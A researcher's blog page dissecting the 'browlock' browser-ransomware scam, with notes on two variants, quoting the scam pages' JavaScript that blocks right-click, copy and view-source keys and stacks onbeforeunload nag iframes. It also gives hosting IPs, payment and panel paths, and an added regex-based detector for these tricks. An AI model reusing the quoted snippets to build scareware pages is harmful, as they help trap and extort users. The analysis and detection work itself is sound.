Ransomware attacks will grow more than 300% from Black Friday
The end-of-year shopping season is about to begin, and the market expects online shopping to continue to play an important role in sales. But although Black Friday and Cyber Monday are generally seen as the start of the holiday shopping season, security experts at F-Secure warn that criminals may run campaigns of…
About three months ago I published an article regarding the 'browlock' browser ransomware here. Recently I discovered a new variant of this browser ransomware. This time, instead of a generic allegation from the local police department, users are warned about piracy.
The first time this one popped up was around the end of September; at the time it was hosted on 213.133.111.10 (malwr.com). Currently it is hosted on 178.254.44.45 (malwr.com).
After this the user is redirected to the gate of the browserlocker:
/panel/landing/gate.php?hwid=%
The % is filled with an ID generated from system metadata. This page then redirects the user to the country-specific template for the locker; these are titled DE.php, NL.php, CH.php, etc. For the country lookup they use the Skypex Geo library.
This browserlocker variant should not even be called a browser locker, as it doesn't lock the browser at all. There is only some JavaScript to disable the right-click option on the web page. From the landing page:
<!--
//Disable right click script
// IE branch: document.all only exists in old Internet Explorer.
// `message` is never defined in the snippet as captured, so this line throws
// before `return false` is reached.
function clickIE() {if (document.all) {(message);return false;}}
// Netscape/Gecko branch: mouse button 2 (middle) or 3 (right) is swallowed
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
// Belt and braces: the context menu is refused regardless of browser
document.oncontextmenu=new Function("return false")
// -->
In no way does the landing page block the user from leaving or simply closing the browser/tab, as the first browlock did. The landing page itself looks ripped from other templates, and the payment buttons sometimes overlap the rest of the information.
The payment method is always Paysafecard; no other payment method has been implemented by the actors at this time. There are, however, hints that they had implemented, or are going to implement, Ukash at some point, judging by a snippet of JavaScript code in one of the landing page files:
The panel from which they operate this scam also has partially broken scripts, dangling references to scripts and stylesheets, and more. For those wanting to poke around, the panel logins are located here:
The actors behind this setup seem to originate from a German-speaking country, because the base template for their locker is German and so is their management panel. This can also be seen in their logout message:
178.254.44.45/loader/logout
This says "Logout erfolgreich!", which means the logout was successful.
They currently target the following countries with their browser 'locker':
Austria
Belgium
Switzerland
Germany
Spain
Great Britain
Greece
Italy
Netherlands
Portugal
Sweden
United States
And the designs for each country; Belgium has two designs, as the country has a Flemish-speaking and a French-speaking part.
It seems our ransomware friends have decided to take an easier path. Instead of having to infect machines, they now just hijack the browser. This is done via advertisements: where you would normally get an exploit kit to drop the ransomware on the machine, it is now just a website. It loads no exploit kit and no malware, just a web page.
Edit: It was pointed out to me that this is 'Browlock' as described here by F-Secure: http://www.f-secure.com/weblog/archives/00002590.html
They do some tricks to fool the average home user into thinking their PC might be locked. The page doesn't allow the tab/browser to simply be closed, it shows nag messages, and it disables clicking and context menu interaction. But just killing the process, or holding the Enter key when the nag messages start, will solve the problem of the 'locking'. There is no locking of files and no locking of the actual browser, just JavaScript snippets to convince the user.
The page itself is far from interesting; it is the usual "You have committed a crime! You must pay X amount of currency to unlock your PC". The only nagging part of these browser ransomware pages is the little snippets that try to keep you from leaving the page. It has some JavaScript to disable copy/paste and the right mouse button context menu:
// Handlers that swallow drag, text selection and the context menu
document.ondragstart = test;
document.onselectstart = test;
document.oncontextmenu = test;
function test() {
return false;
}
// Stray statement: reads the handler back and does nothing
document.oncontextmenu;
// Blocks Ctrl+U (view source), Ctrl+C (copy) and Ctrl+A (select all). Both the
// lowercase keypress codes (117/99/97) and the keydown codes (85/67/65) are
// checked. The snippet as captured does not show where this handler is attached.
function catchControlKeys(event){
var code=event.keyCode ? event.keyCode : event.which ? event.which : null;
if (event.ctrlKey){
// Ctrl+U
if (code == 117) return false;
if (code == 85) return false;
// Ctrl+C
if (code == 99) return false;
if (code == 67) return false;
// Ctrl+A
if (code == 97) return false;
if (code == 65) return false;
}
}
The snippet below is inserted a couple of hundred times to nag users when they try to close the browser or tab:
<iframe srcdoc="<script>window.onbeforeunload = function(env){return '< Automated translated setence saying your browser is locked and you should pay to unlock it >';}</script>" src="about:srcdoc"></iframe>
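The nag and anti-escape idioms quoted on this page (the right-click trap in the piracy variant, and the selection/key blocking and stacked onbeforeunload iframes here) can be fingerprinted statically, which is useful when triaging a captured landing page offline. The scorer below is an added example written for this page; it is not code from the original post or from the campaign. The regexes, the weights and thresholds, the example.invalid domain and both sample pages are assumptions constructed for the demo.

```javascript
// Added example (not from the original post): a static indicator scorer for
// the browser-"locker" tricks described on this page. It counts the nag and
// anti-escape idioms in raw HTML. Regexes, weights, thresholds and the sample
// pages below are assumptions constructed for this demo.

const INDICATORS = {
  // <iframe srcdoc="<script>window.onbeforeunload = ..."> stacked many times
  beforeunloadIframes:
    /<iframe\b[^>]*?\bsrcdoc\s*=\s*(?:"[^"]*?onbeforeunload|'[^']*?onbeforeunload)/gi,
  // document.oncontextmenu = test / new Function("return false")
  contextMenuBlock: /document\.oncontextmenu\s*=/gi,
  // copy/drag suppression via onselectstart / ondragstart handlers
  selectionBlock: /document\.on(?:selectstart|dragstart)\s*=/gi,
  // Ctrl+U / Ctrl+C / Ctrl+A keyCode checks (117/85, 99/67, 97/65)
  ctrlKeyBlock: /code\s*==\s*(?:117|85|99|67|97|65)\s*\)\s*return\s+false/gi,
  // legacy right-click trap keyed on mouse button 2 or 3
  mouseButtonTrap: /e\.which\s*==\s*[23]/gi,
  // voucher checkout endpoint or the prepaid brands used for payment
  voucherPayment: /checkout\.php|paysafecard|ukash/gi,
};

function countMatches(html, re) {
  // String.prototype.match with a /g regex returns every match, or null
  return (html.match(re) || []).length;
}

// Weighted score: the stacked onbeforeunload iframes are the strongest signal;
// a single oncontextmenu handler on its own is common on benign sites.
function scoreLandingPage(html) {
  const counts = {};
  for (const [name, re] of Object.entries(INDICATORS)) {
    counts[name] = countMatches(html, re);
  }
  let score = 0;
  if (counts.beforeunloadIframes >= 10) score += 3;
  else if (counts.beforeunloadIframes >= 1) score += 1;
  if (counts.contextMenuBlock) score += 1;
  if (counts.selectionBlock) score += 1;
  if (counts.ctrlKeyBlock) score += 1;
  if (counts.mouseButtonTrap) score += 1;
  if (counts.voucherPayment) score += 2;
  const verdict = score >= 4 ? 'likely browlock' : score >= 2 ? 'suspicious' : 'benign';
  return { counts, score, verdict };
}

// Constructed sample pages (assumptions, not captures from the campaign).
const NAG_IFRAME =
  '<iframe srcdoc="<script>window.onbeforeunload = function(env){return ' +
  "'Your browser is locked';}</script>\" src=\"about:srcdoc\"></iframe>\n";

const LOCKER_PAGE =
  '<html><body><h1>You have committed a crime!</h1>\n' +
  '<form method="post" action="http://example.invalid/checkout.php">' +
  '<input name="paysafecard"></form>\n' +
  '<script>\n' +
  'document.ondragstart = test; document.onselectstart = test; document.oncontextmenu = test;\n' +
  'function test() { return false; }\n' +
  'function catchControlKeys(event){ var code = event.keyCode;\n' +
  '  if (event.ctrlKey){ if (code == 85) return false; if (code == 67) return false; } }\n' +
  '</script>\n' +
  NAG_IFRAME.repeat(12) +
  '</body></html>';

// A gallery site that only disables right-click should stay below the bar.
const BENIGN_PAGE =
  '<html><body><p>Photo gallery</p>\n' +
  '<script>document.oncontextmenu = function () { return false; };</script>\n' +
  '</body></html>';

console.log(JSON.stringify(scoreLandingPage(LOCKER_PAGE), null, 2));
console.log(JSON.stringify(scoreLandingPage(BENIGN_PAGE), null, 2));
```

The counts are the part worth keeping in a report: a dozen identical srcdoc iframes carrying onbeforeunload is the tell that separates a lock page from an ordinary site that merely disables right-click, and the checkout/voucher strings tie the page to the payment flow. Thresholds are deliberately conservative; tune them against your own corpus before relying on the verdict.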
All the payment processing is done by POSTing the entered payment numbers to:
hxxp://r0849(dot)com/checkout.php
Manually visiting this page redirects you to another ransomware page.
Everything runs on the same machine, with IP 91.220.131.108.
This IP currently has the following domains pointing to it:
Appending '/?result=success' to these URLs will show you the screen for a successful payment; appending '/?result=fail' will show you the screen for a wrong code. When a user 'successfully' unlocks the 'ransomware' by paying, he or she gets a message saying the browser will be unlocked in 12 hours.
And here is a list of all the templates used for the different countries they target:
Edit: Added Mexican and Irish template designs thanks to Kafeine!
Edit 2: Added Portuguese, Finnish and Australian designs thanks to Kira 2.0!